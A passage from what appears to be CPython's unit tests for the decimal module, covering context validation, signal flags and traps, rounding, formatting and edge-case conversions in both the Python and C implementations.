self.assertEqual(x, Decimal('0.00390625'))
x = Decimal(2**16) ** Decimal("-0.6")
self.assertEqual(x, Decimal('0.0012885819'))
x = Decimal("256e7") ** Decimal("-0.5")
x = Decimal(152587890625) ** Decimal('-0.0625')
self.assertEqual(x, Decimal("0.2"))
x = Decimal("152587890625e7") ** Decimal('-0.0625')
x = Decimal(5**2659) ** Decimal('-0.0625')
c.prec = 1
x = Decimal("152587890625") ** Decimal('-0.5')
c.prec = 201
x = Decimal(2**578) ** Decimal("-0.5")
def test_py_immutability_operations(self):
# Do operations and check that it didn't change internal objects.
Decimal = P.Decimal
DefaultContext = P.DefaultContext
setcontext = P.setcontext
c = DefaultContext.copy()
c.traps = dict((s, 0) for s in OrderedSignals[P])
setcontext(c)
d1 = Decimal('-25e55')
b1 = Decimal('-25e55')
d2 = Decimal('33e+33')
b2 = Decimal('33e+33')
def checkSameDec(operation, useOther=False):
if useOther:
eval("d1." + operation + "(d2)")
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
self.assertEqual(d2._sign, b2._sign)
self.assertEqual(d2._int, b2._int)
self.assertEqual(d2._exp, b2._exp)
else:
eval("d1." + operation + "()")
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
Decimal(d1)
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
checkSameDec("__abs__")
checkSameDec("__add__", True)
checkSameDec("__divmod__", True)
checkSameDec("__eq__", True)
checkSameDec("__ne__", True)
checkSameDec("__le__", True)
checkSameDec("__lt__", True)
checkSameDec("__ge__", True)
checkSameDec("__gt__", True)
checkSameDec("__float__")
checkSameDec("__floordiv__", True)
checkSameDec("__hash__")
checkSameDec("__int__")
checkSameDec("__trunc__")
checkSameDec("__mod__", True)
checkSameDec("__mul__", True)
checkSameDec("__neg__")
checkSameDec("__bool__")
checkSameDec("__pos__")
checkSameDec("__pow__", True)
checkSameDec("__radd__", True)
checkSameDec("__rdivmod__", True)
checkSameDec("__repr__")
checkSameDec("__rfloordiv__", True)
checkSameDec("__rmod__", True)
checkSameDec("__rmul__", True)
checkSameDec("__rpow__", True)
checkSameDec("__rsub__", True)
checkSameDec("__str__")
checkSameDec("__sub__", True)
checkSameDec("__truediv__", True)
checkSameDec("adjusted")
checkSameDec("as_tuple")
checkSameDec("compare", True)
checkSameDec("max", True)
checkSameDec("min", True)
checkSameDec("normalize")
checkSameDec("quantize", True)
checkSameDec("remainder_near", True)
checkSameDec("same_quantum", True)
checkSameDec("sqrt")
checkSameDec("to_eng_string")
checkSameDec("to_integral")
def test_py_decimal_id(self):
Decimal = P.Decimal
d = Decimal(45)
e = Decimal(d)
self.assertEqual(str(e), '45')
self.assertNotEqual(id(d), id(e))
def test_py_rescale(self):
# Coverage
Decimal = P.Decimal
localcontext = P.localcontext
with localcontext() as c:
x = Decimal("NaN")._rescale(3, ROUND_UP)
self.assertTrue(x.is_nan())
def test_py__round(self):
# Coverage
Decimal = P.Decimal
self.assertRaises(ValueError, Decimal("3.1234")._round, 0, ROUND_UP)
class CFunctionality(unittest.TestCase):
"""Extra functionality in _decimal"""
@requires_extra_functionality
def test_c_ieee_context(self):
# issue 8786: Add support for IEEE 754 contexts to decimal module.
IEEEContext = C.IEEEContext
DECIMAL32 = C.DECIMAL32
DECIMAL64 = C.DECIMAL64
DECIMAL128 = C.DECIMAL128
def assert_rest(self, context):
self.assertEqual(context.clamp, 1)
assert_signals(self, context, 'traps', [])
assert_signals(self, context, 'flags', [])
c = IEEEContext(DECIMAL32)
self.assertEqual(c.prec, 7)
self.assertEqual(c.Emax, 96)
self.assertEqual(c.Emin, -95)
assert_rest(self, c)
c = IEEEContext(DECIMAL64)
self.assertEqual(c.prec, 16)
self.assertEqual(c.Emax, 384)
self.assertEqual(c.Emin, -383)
assert_rest(self, c)
c = IEEEContext(DECIMAL128)
self.assertEqual(c.prec, 34)
self.assertEqual(c.Emax, 6144)
self.assertEqual(c.Emin, -6143)
assert_rest(self, c)
# Invalid values
self.assertRaises(OverflowError, IEEEContext, 2**63)
self.assertRaises(ValueError, IEEEContext, -1)
self.assertRaises(ValueError, IEEEContext, 1024)
@requires_extra_functionality
def test_c_context(self):
Context = C.Context
c = Context(flags=C.DecClamped, traps=C.DecRounded)
self.assertEqual(c._flags, C.DecClamped)
self.assertEqual(c._traps, C.DecRounded)
@requires_extra_functionality
def test_constants(self):
# Condition flags
cond = (
C.DecClamped, C.DecConversionSyntax, C.DecDivisionByZero,
C.DecDivisionImpossible, C.DecDivisionUndefined,
C.DecFpuError, C.DecInexact, C.DecInvalidContext,
C.DecInvalidOperation, C.DecMallocError,
C.DecFloatOperation, C.DecOverflow, C.DecRounded,
C.DecSubnormal, C.DecUnderflow
)
# IEEEContext
self.assertEqual(C.DECIMAL32, 32)
self.assertEqual(C.DECIMAL64, 64)
self.assertEqual(C.DECIMAL128, 128)
self.assertEqual(C.IEEE_CONTEXT_MAX_BITS, 512)
# Conditions
for i, v in enumerate(cond):
self.assertEqual(v, 1<<i)
self.assertEqual(C.DecIEEEInvalidOperation,
C.DecConversionSyntax|
C.DecDivisionImpossible|
C.DecDivisionUndefined|
C.DecFpuError|
C.DecInvalidContext|
C.DecInvalidOperation|
C.DecMallocError)
self.assertEqual(C.DecErrors,
C.DecIEEEInvalidOperation|
C.DecDivisionByZero)
self.assertEqual(C.DecTraps,
C.DecErrors|C.DecOverflow|C.DecUnderflow)
class CWhitebox(unittest.TestCase):
"""Whitebox testing for _decimal"""
def test_bignum(self):
# Not exactly whitebox, but too slow with pydecimal.
Decimal = C.Decimal
localcontext = C.localcontext
b1 = 10**35
b2 = 10**36
with localcontext() as c:
c.prec = 1000000
for i in range(5):
a = random.randrange(b1, b2)
b = random.randrange(1000, 1200)
x = a ** b
y = Decimal(a) ** Decimal(b)
self.assertEqual(x, y)
def test_invalid_construction(self):
self.assertRaises(TypeError, C.Decimal, 9, "xyz")
def test_c_input_restriction(self):
# Too large for _decimal to be converted exactly
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
Context = C.Context
localcontext = C.localcontext
with localcontext(Context()):
self.assertRaises(InvalidOperation, Decimal,
"1e9999999999999999999")
def test_c_context_repr(self):
# This test is _decimal-only because flags are not printed
# in the same order.
DefaultContext = C.DefaultContext
FloatOperation = C.FloatOperation
c = DefaultContext.copy()
c.prec = 425000000
c.Emax = 425000000
c.Emin = -425000000
c.rounding = ROUND_HALF_DOWN
c.capitals = 0
c.clamp = 1
for sig in OrderedSignals[C]:
c.flags[sig] = True
c.traps[sig] = True
c.flags[FloatOperation] = True
c.traps[FloatOperation] = True
s = c.__repr__()
t = "Context(prec=425000000, rounding=ROUND_HALF_DOWN, " \
"Emin=-425000000, Emax=425000000, capitals=0, clamp=1, " \
"flags=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \
"FloatOperation, Overflow, Rounded, Subnormal, Underflow], " \
"traps=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \
"FloatOperation, Overflow, Rounded, Subnormal, Underflow])"
self.assertEqual(s, t)
def test_c_context_errors(self):
Context = C.Context
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
FloatOperation = C.FloatOperation
localcontext = C.localcontext
getcontext = C.getcontext
setcontext = C.setcontext
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
c = Context()
# SignalDict: input validation
self.assertRaises(KeyError, c.flags.__setitem__, 801, 0)
self.assertRaises(KeyError, c.traps.__setitem__, 801, 0)
self.assertRaises(ValueError, c.flags.__delitem__, Overflow)
self.assertRaises(ValueError, c.traps.__delitem__, InvalidOperation)
self.assertRaises(TypeError, setattr, c, 'flags', ['x'])
self.assertRaises(TypeError, setattr, c,'traps', ['y'])
self.assertRaises(KeyError, setattr, c, 'flags', {0:1})
self.assertRaises(KeyError, setattr, c, 'traps', {0:1})
# Test assignment from a signal dict with the correct length but
# one invalid key.
d = c.flags.copy()
del d[FloatOperation]
d["XYZ"] = 91283719
self.assertRaises(KeyError, setattr, c, 'flags', d)
self.assertRaises(KeyError, setattr, c, 'traps', d)
# Input corner cases
int_max = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
gt_max_emax = 10**18 if HAVE_CONFIG_64 else 10**9
# prec, Emax, Emin
for attr in ['prec', 'Emax']:
self.assertRaises(ValueError, setattr, c, attr, gt_max_emax)
self.assertRaises(ValueError, setattr, c, 'Emin', -gt_max_emax)
# prec, Emax, Emin in context constructor
self.assertRaises(ValueError, Context, prec=gt_max_emax)
self.assertRaises(ValueError, Context, Emax=gt_max_emax)
self.assertRaises(ValueError, Context, Emin=-gt_max_emax)
# Overflow in conversion
self.assertRaises(OverflowError, Context, prec=int_max+1)
self.assertRaises(OverflowError, Context, Emax=int_max+1)
self.assertRaises(OverflowError, Context, Emin=-int_max-2)
self.assertRaises(OverflowError, Context, clamp=int_max+1)
self.assertRaises(OverflowError, Context, capitals=int_max+1)
# OverflowError, general ValueError
for attr in ('prec', 'Emin', 'Emax', 'capitals', 'clamp'):
self.assertRaises(OverflowError, setattr, c, attr, int_max+1)
self.assertRaises(OverflowError, setattr, c, attr, -int_max-2)
if sys.platform != 'win32':
self.assertRaises(ValueError, setattr, c, attr, int_max)
self.assertRaises(ValueError, setattr, c, attr, -int_max-1)
# OverflowError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax
if C.MAX_PREC == 425000000:
self.assertRaises(OverflowError, getattr(c, '_unsafe_setprec'),
int_max+1)
self.assertRaises(OverflowError, getattr(c, '_unsafe_setemax'),
int_max+1)
self.assertRaises(OverflowError, getattr(c, '_unsafe_setemin'),
-int_max-2)
# ValueError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax
if C.MAX_PREC == 425000000:
self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'), 0)
self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'),
1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'), -1)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'),
1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'),
-1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'), 1)
# capitals, clamp
for attr in ['capitals', 'clamp']:
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(ValueError, setattr, c, attr, 2)
self.assertRaises(TypeError, setattr, c, attr, [1,2,3])
if HAVE_CONFIG_64:
self.assertRaises(ValueError, setattr, c, attr, 2**32)
self.assertRaises(ValueError, setattr, c, attr, 2**32+1)
# Invalid local context
self.assertRaises(TypeError, exec, 'with localcontext("xyz"): pass',
locals())
self.assertRaises(TypeError, exec,
'with localcontext(context=getcontext()): pass',
locals())
# setcontext
saved_context = getcontext()
self.assertRaises(TypeError, setcontext, "xyz")
setcontext(saved_context)
def test_rounding_strings_interned(self):
self.assertIs(C.ROUND_UP, P.ROUND_UP)
self.assertIs(C.ROUND_DOWN, P.ROUND_DOWN)
self.assertIs(C.ROUND_CEILING, P.ROUND_CEILING)
self.assertIs(C.ROUND_FLOOR, P.ROUND_FLOOR)
self.assertIs(C.ROUND_HALF_UP, P.ROUND_HALF_UP)
self.assertIs(C.ROUND_HALF_DOWN, P.ROUND_HALF_DOWN)
self.assertIs(C.ROUND_HALF_EVEN, P.ROUND_HALF_EVEN)
self.assertIs(C.ROUND_05UP, P.ROUND_05UP)
@requires_extra_functionality
def test_c_context_errors_extra(self):
Context = C.Context
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
localcontext = C.localcontext
getcontext = C.getcontext
setcontext = C.setcontext
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
c = Context()
# Input corner cases
int_max = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
# OverflowError, general ValueError
self.assertRaises(OverflowError, setattr, c, '_allcr', int_max+1)
self.assertRaises(OverflowError, setattr, c, '_allcr', -int_max-2)
if sys.platform != 'win32':
self.assertRaises(ValueError, setattr, c, '_allcr', int_max)
self.assertRaises(ValueError, setattr, c, '_allcr', -int_max-1)
# OverflowError, general TypeError
for attr in ('_flags', '_traps'):
self.assertRaises(OverflowError, setattr, c, attr, int_max+1)
self.assertRaises(OverflowError, setattr, c, attr, -int_max-2)
if sys.platform != 'win32':
self.assertRaises(TypeError, setattr, c, attr, int_max)
self.assertRaises(TypeError, setattr, c, attr, -int_max-1)
# _allcr
self.assertRaises(ValueError, setattr, c, '_allcr', -1)
self.assertRaises(ValueError, setattr, c, '_allcr', 2)
self.assertRaises(TypeError, setattr, c, '_allcr', [1,2,3])
if HAVE_CONFIG_64:
self.assertRaises(ValueError, setattr, c, '_allcr', 2**32)
self.assertRaises(ValueError, setattr, c, '_allcr', 2**32+1)
# _flags, _traps
for attr in ['_flags', '_traps']:
self.assertRaises(TypeError, setattr, c, attr, 999999)
self.assertRaises(TypeError, setattr, c, attr, 'x')
def test_c_valid_context(self):
# These tests are for code coverage in _decimal.
DefaultContext = C.DefaultContext
Clamped = C.Clamped
Underflow = C.Underflow
Inexact = C.Inexact
Rounded = C.Rounded
Subnormal = C.Subnormal
c = DefaultContext.copy()
# Exercise all getters and setters
c.prec = 34
c.rounding = ROUND_HALF_UP
c.Emax = 3000
c.Emin = -3000
c.capitals = 1
c.clamp = 0
self.assertEqual(c.prec, 34)
self.assertEqual(c.rounding, ROUND_HALF_UP)
self.assertEqual(c.Emin, -3000)
self.assertEqual(c.Emax, 3000)
self.assertEqual(c.capitals, 1)
self.assertEqual(c.clamp, 0)
self.assertEqual(c.Etiny(), -3033)
self.assertEqual(c.Etop(), 2967)
# Exercise all unsafe setters
if C.MAX_PREC == 425000000:
c._unsafe_setprec(999999999)
c._unsafe_setemax(999999999)
c._unsafe_setemin(-999999999)
self.assertEqual(c.prec, 999999999)
self.assertEqual(c.Emax, 999999999)
self.assertEqual(c.Emin, -999999999)
@requires_extra_functionality
def test_c_valid_context_extra(self):
DefaultContext = C.DefaultContext
c = DefaultContext.copy()
self.assertEqual(c._allcr, 1)
c._allcr = 0
self.assertEqual(c._allcr, 0)
def test_c_round(self):
# Restricted input.
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
localcontext = C.localcontext
MAX_EMAX = C.MAX_EMAX
MIN_ETINY = C.MIN_ETINY
int_max = 2**63-1 if C.MAX_PREC > 425000000 else 2**31-1
with localcontext() as c:
c.traps[InvalidOperation] = True
self.assertRaises(InvalidOperation, Decimal("1.23").__round__,
-int_max-1)
self.assertRaises(InvalidOperation, Decimal("1.23").__round__,
int_max)
self.assertRaises(InvalidOperation, Decimal("1").__round__,
int(MAX_EMAX+1))
self.assertRaises(C.InvalidOperation, Decimal("1").__round__,
-int(MIN_ETINY-1))
self.assertRaises(OverflowError, Decimal("1.23").__round__,
-int_max-2)
self.assertRaises(OverflowError, Decimal("1.23").__round__,
int_max+1)
def test_c_format(self):
# Restricted input
Decimal = C.Decimal
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", [], 9)
self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", 9)
self.assertRaises(TypeError, Decimal(1).__format__, [])
self.assertRaises(ValueError, Decimal(1).__format__, "<>=10.10")
maxsize = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
self.assertRaises(ValueError, Decimal("1.23456789").__format__,
"=%d.1" % maxsize)
def test_c_integral(self):
Decimal = C.Decimal
Inexact = C.Inexact
localcontext = C.localcontext
x = Decimal(10)
self.assertEqual(x.to_integral(), 10)
self.assertRaises(TypeError, x.to_integral, '10')
self.assertRaises(TypeError, x.to_integral, 10, 'x')
self.assertRaises(TypeError, x.to_integral, 10)
self.assertEqual(x.to_integral_value(), 10)
self.assertRaises(TypeError, x.to_integral_value, '10')
self.assertRaises(TypeError, x.to_integral_value, 10, 'x')
self.assertRaises(TypeError, x.to_integral_value, 10)
self.assertEqual(x.to_integral_exact(), 10)
self.assertRaises(TypeError, x.to_integral_exact, '10')
self.assertRaises(TypeError, x.to_integral_exact, 10, 'x')
self.assertRaises(TypeError, x.to_integral_exact, 10)
with localcontext() as c:
x = Decimal("99999999999999999999999999.9").to_integral_value(ROUND_UP)
self.assertEqual(x, Decimal('100000000000000000000000000'))
x = Decimal("99999999999999999999999999.9").to_integral_exact(ROUND_UP)
self.assertEqual(x, Decimal('100000000000000000000000000'))
c.traps[Inexact] = True
self.assertRaises(Inexact, Decimal("999.9").to_integral_exact, ROUND_UP)
def test_c_funcs(self):
# Invalid arguments
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
DivisionByZero = C.DivisionByZero
getcontext = C.getcontext
localcontext = C.localcontext
self.assertEqual(Decimal('9.99e10').to_eng_string(), '99.9E+9')
self.assertRaises(TypeError, pow, Decimal(1), 2, "3")
self.assertRaises(TypeError, Decimal(9).number_class, "x", "y")
self.assertRaises(TypeError, Decimal(9).same_quantum, 3, "x", "y")
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), []
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), getcontext()
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), 10
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), ROUND_UP, 1000
)
with localcontext() as c:
c.clear_traps()
# Invalid arguments
self.assertRaises(TypeError, c.copy_sign, Decimal(1), "x", "y")
self.assertRaises(TypeError, c.canonical, 200)
self.assertRaises(TypeError, c.is_canonical, 200)
self.assertRaises(TypeError, c.divmod, 9, 8, "x", "y")
self.assertRaises(TypeError, c.same_quantum, 9, 3, "x", "y")
self.assertEqual(str(c.canonical(Decimal(200))), '200')
self.assertEqual(c.radix(), 10)
c.traps[DivisionByZero] = True
self.assertRaises(DivisionByZero, Decimal(9).__divmod__, 0)
self.assertRaises(DivisionByZero, c.divmod, 9, 0)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
c.traps[InvalidOperation] = True
self.assertRaises(InvalidOperation, Decimal(9).__divmod__, 0)
self.assertRaises(InvalidOperation, c.divmod, 9, 0)
self.assertTrue(c.flags[DivisionByZero])
c.traps[InvalidOperation] = True
c.prec = 2
self.assertRaises(InvalidOperation, pow, Decimal(1000), 1, 501)
def test_va_args_exceptions(self):
Decimal = C.Decimal
Context = C.Context
x = Decimal("10001111111")
for attr in ['exp', 'is_normal', 'is_subnormal', 'ln', 'log10',
'logb', 'logical_invert', 'next_minus', 'next_plus',
'normalize', 'number_class', 'sqrt', 'to_eng_string']:
func = getattr(x, attr)
self.assertRaises(TypeError, func, context="x")
self.assertRaises(TypeError, func, "x", context=None)
for attr in ['compare', 'compare_signal', 'logical_and',
'logical_or', 'max', 'max_mag', 'min', 'min_mag',
'remainder_near', 'rotate', 'scaleb', 'shift']:
func = getattr(x, attr)
self.assertRaises(TypeError, func, context="x")
self.assertRaises(TypeError, func, "x", context=None)
self.assertRaises(TypeError, x.to_integral, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral, [], [])
self.assertRaises(TypeError, x.to_integral_value, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral_value, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral_value, [], [])
self.assertRaises(TypeError, x.to_integral_exact, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral_exact, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral_exact, [], [])
self.assertRaises(TypeError, x.fma, 1, 2, context="x")
self.assertRaises(TypeError, x.fma, 1, 2, "x", context=None)
self.assertRaises(TypeError, x.quantize, 1, [], context=None)
self.assertRaises(TypeError, x.quantize, 1, [], rounding=None)
self.assertRaises(TypeError, x.quantize, 1, [], [])
c = Context()
self.assertRaises(TypeError, c.power, 1, 2, mod="x")
self.assertRaises(TypeError, c.power, 1, "x", mod=None)
self.assertRaises(TypeError, c.power, "x", 2, mod=None)
@requires_extra_functionality
def test_c_context_templates(self):
self.assertEqual(
C.BasicContext._traps,
C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow|
C.DecUnderflow|C.DecClamped
)
self.assertEqual(
C.DefaultContext._traps,
C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow
)
@requires_extra_functionality
def test_c_signal_dict(self):
# SignalDict coverage
Context = C.Context
DefaultContext = C.DefaultContext
InvalidOperation = C.InvalidOperation
FloatOperation = C.FloatOperation
DivisionByZero = C.DivisionByZero
Overflow = C.Overflow
Subnormal = C.Subnormal
Underflow = C.Underflow
Rounded = C.Rounded
Inexact = C.Inexact
Clamped = C.Clamped
DecClamped = C.DecClamped
DecInvalidOperation = C.DecInvalidOperation
DecIEEEInvalidOperation = C.DecIEEEInvalidOperation
def assertIsExclusivelySet(signal, signal_dict):
for sig in signal_dict:
if sig == signal:
self.assertTrue(signal_dict[sig])
else:
self.assertFalse(signal_dict[sig])
c = DefaultContext.copy()
# Signal dict methods
self.assertTrue(Overflow in c.traps)
c.clear_traps()
for k in c.traps.keys():
c.traps[k] = True
for v in c.traps.values():
self.assertTrue(v)
c.clear_traps()
for k, v in c.traps.items():
self.assertFalse(v)
self.assertFalse(c.flags.get(Overflow))
self.assertIs(c.flags.get("x"), None)
self.assertEqual(c.flags.get("x", "y"), "y")
self.assertRaises(TypeError, c.flags.get, "x", "y", "z")
self.assertEqual(len(c.flags), len(c.traps))
s = sys.getsizeof(c.flags)
s = sys.getsizeof(c.traps)
s = c.flags.__repr__()
# Set flags/traps.
c.clear_flags()
c._flags = DecClamped
self.assertTrue(c.flags[Clamped])
c.clear_traps()
c._traps = DecInvalidOperation
self.assertTrue(c.traps[InvalidOperation])
# Set flags/traps from dictionary.
c.clear_flags()
d = c.flags.copy()
d[DivisionByZero] = True
c.flags = d
assertIsExclusivelySet(DivisionByZero, c.flags)
c.clear_traps()
d = c.traps.copy()
d[Underflow] = True
c.traps = d
assertIsExclusivelySet(Underflow, c.traps)
# Random constructors
IntSignals = {
Clamped: C.DecClamped,
Rounded: C.DecRounded,
Inexact: C.DecInexact,
Subnormal: C.DecSubnormal,
Underflow: C.DecUnderflow,
Overflow: C.DecOverflow,
DivisionByZero: C.DecDivisionByZero,
FloatOperation: C.DecFloatOperation,
InvalidOperation: C.DecIEEEInvalidOperation
}
IntCond = [
C.DecDivisionImpossible, C.DecDivisionUndefined, C.DecFpuError,
C.DecInvalidContext, C.DecInvalidOperation, C.DecMallocError,
C.DecConversionSyntax,
]
lim = len(OrderedSignals[C])
for r in range(lim):
for t in range(lim):
for round in RoundingModes:
flags = random.sample(OrderedSignals[C], r)
traps = random.sample(OrderedSignals[C], t)
prec = random.randrange(1, 10000)
emin = random.randrange(-10000, 0)
emax = random.randrange(0, 10000)
clamp = random.randrange(0, 2)
caps = random.randrange(0, 2)
cr = random.randrange(0, 2)
c = Context(prec=prec, rounding=round, Emin=emin, Emax=emax,
capitals=caps, clamp=clamp, flags=list(flags),
traps=list(traps))
self.assertEqual(c.prec, prec)
self.assertEqual(c.rounding, round)
self.assertEqual(c.Emin, emin)
self.assertEqual(c.Emax, emax)
self.assertEqual(c.capitals, caps)
self.assertEqual(c.clamp, clamp)
f = 0
for x in flags:
f |= IntSignals[x]
self.assertEqual(c._flags, f)
f = 0
for x in traps:
f |= IntSignals[x]
self.assertEqual(c._traps, f)
for cond in IntCond:
c._flags = cond
self.assertTrue(c._flags&DecIEEEInvalidOperation)
assertIsExclusivelySet(InvalidOperation, c.flags)
for cond in IntCond:
c._traps = cond
self.assertTrue(c._traps&DecIEEEInvalidOperation)
assertIsExclusivelySet(InvalidOperation, c.traps)
def test_invalid_override(self):
Decimal = C.Decimal
try:
from locale import CHAR_MAX
except ImportError:
self.skipTest('locale.CHAR_MAX not available')
def make_grouping(lst):
return ''.join([chr(x) for x in lst])
def get_fmt(x, override=None, fmt='n'):
return Decimal(x).__format__(fmt, override)
invalid_grouping = {
'decimal_point' : ',',
'grouping' : make_grouping([255, 255, 0]),
'thousands_sep' : ','
}
invalid_dot = {
'decimal_point' : 'xxxxx',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : ','
}
invalid_sep = {
'decimal_point' : '.',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : 'yyyyy'
}
if CHAR_MAX == 127: # negative grouping in override
self.assertRaises(ValueError, get_fmt, 12345,
invalid_grouping, 'g')
self.assertRaises(ValueError, get_fmt, 12345, invalid_dot, 'g')
self.assertRaises(ValueError, get_fmt, 12345, invalid_sep, 'g')
def test_exact_conversion(self):
Decimal = C.Decimal
localcontext = C.localcontext
InvalidOperation = C.InvalidOperation
with localcontext() as c:
c.traps[InvalidOperation] = True
# Clamped
x = "0e%d" % sys.maxsize
self.assertRaises(InvalidOperation, Decimal, x)
x = "0e%d" % (-sys.maxsize-1)
self.assertRaises(InvalidOperation, Decimal, x)
# Overflow
x = "1e%d" % sys.maxsize
self.assertRaises(InvalidOperation, Decimal, x)
# Underflow
x = "1e%d" % (-sys.maxsize-1)
self.assertRaises(InvalidOperation, Decimal, x)
def test_from_tuple(self):
Decimal = C.Decimal
localcontext = C.localcontext
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
Underflow = C.Underflow
with localcontext() as c:
c.prec = 9
c.traps[InvalidOperation] = True
c.traps[Overflow] = True
c.traps[Underflow] = True
# SSIZE_MAX
x = (1, (), sys.maxsize)
self.assertEqual(str(c.create_decimal(x)), '-0E+999999')
self.assertRaises(InvalidOperation, Decimal, x)
x = (1, (0, 1, 2), sys.maxsize)
self.assertRaises(Overflow, c.create_decimal, x)
self.assertRaises(InvalidOperation, Decimal, x)
# SSIZE_MIN
x = (1, (), -sys.maxsize-1)
self.assertEqual(str(c.create_decimal(x)), '-0E-1000007')
self.assertRaises(InvalidOperation, Decimal, x)
x = (1, (0, 1, 2), -sys.maxsize-1)
self.assertRaises(Underflow, c.create_decimal, x)
self.assertRaises(InvalidOperation, Decimal, x)
# OverflowError
x = (1, (), sys.maxsize+1)
self.assertRaises(OverflowError, c.create_decimal, x)
self.assertRaises(OverflowError, Decimal, x)
x = (1, (), -sys.maxsize-2)
self.assertRaises(OverflowError, c.create_decimal, x)
self.assertRaises(OverflowError, Decimal, x)
# Specials
x = (1, (), "N")
self.assertEqual(str(Decimal(x)), '-sNaN')
x = (1, (0,), "N")
self.assertEqual(str(Decimal(x)), '-sNaN')
x = (1, (0, 1), "N")
self.assertEqual(str(Decimal(x)), '-sNaN1')
def test_sizeof(self):
Decimal = C.Decimal
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
self.assertGreater(Decimal(0).__sizeof__(), 0)
if HAVE_CONFIG_64:
x = Decimal(10**(19*24)).__sizeof__()
y = Decimal(10**(19*25)).__sizeof__()
self.assertEqual(y, x+8)
else:
x = Decimal(10**(9*24)).__sizeof__()
y = Decimal(10**(9*25)).__sizeof__()
self.assertEqual(y, x+4)
def test_internal_use_of_overridden_methods(self):
Decimal = C.Decimal
# Unsound subtyping
class X(float):
def as_integer_ratio(self):
return 1
def __abs__(self):
return self
class Y(float):
def __abs__(self):
return [1]*200
class I(int):
def bit_length(self):
return [1]*200
class Z(float):
def as_integer_ratio(self):
return (I(1), I(1))
def __abs__(self):
return self
for cls in X, Y, Z:
self.assertEqual(Decimal.from_float(cls(101.1)),
Decimal.from_float(101.1))
# Issue 41540:
@unittest.skipIf(sys.platform.startswith("aix"),
"AIX: default ulimit: test is flaky because of extreme over-allocation")
@unittest.skipIf(check_sanitizer(address=True, memory=True),
"ASAN/MSAN sanitizer defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_maxcontext_exact_arith(self):
# Make sure that exact operations do not raise MemoryError due
# to huge intermediate values when the context precision is very
# large.
# The following functions fill the available precision and are
# therefore not suitable for large precisions (by design of the
# specification).
MaxContextSkip = ['logical_invert', 'next_minus', 'next_plus',
'logical_and', 'logical_or', 'logical_xor',
'next_toward', 'rotate', 'shift']
Decimal = C.Decimal
Context = C.Context
localcontext = C.localcontext
# Here only some functions that are likely candidates for triggering a
# MemoryError are tested. deccheck.py has an exhaustive test.
maxcontext = Context(prec=C.MAX_PREC, Emin=C.MIN_EMIN, Emax=C.MAX_EMAX)
with localcontext(maxcontext):
self.assertEqual(Decimal(0).exp(), 1)
self.assertEqual(Decimal(1).ln(), 0)
self.assertEqual(Decimal(1).log10(), 0)
self.assertEqual(Decimal(10**2).log10(), 2)
self.assertEqual(Decimal(10**223).log10(), 223)
self.assertEqual(Decimal(10**19).logb(), 19)
self.assertEqual(Decimal(4).sqrt(), 2)
self.assertEqual(Decimal("40E9").sqrt(), Decimal('2.0E+5'))
self.assertEqual(divmod(Decimal(10), 3), (3, 1))
self.assertEqual(Decimal(10) // 3, 3)
self.assertEqual(Decimal(4) / 2, 2)
self.assertEqual(Decimal(400) ** -1, Decimal('0.0025'))
@requires_docstrings
@unittest.skipUnless(C, "test requires C version")
class SignatureTest(unittest.TestCase):
"""Function signatures"""
def test_inspect_module(self):
for attr in dir(P):
if attr.startswith('_'):
continue
p_func = getattr(P, attr)
c_func = getattr(C, attr)
if (attr == 'Decimal' or attr == 'Context' or
inspect.isfunction(p_func)):
p_sig = inspect.signature(p_func)
c_sig = inspect.signature(c_func)
# parameter names:
c_names = list(c_sig.parameters.keys())
p_names = [x for x in p_sig.parameters.keys() if not
x.startswith('_')]
self.assertEqual(c_names, p_names,
msg="parameter name mismatch in %s" % p_func)
c_kind = [x.kind for x in c_sig.parameters.values()]
p_kind = [x[1].kind for x in p_sig.parameters.items() if not
x[0].startswith('_')]
# parameters:
if attr != 'setcontext':
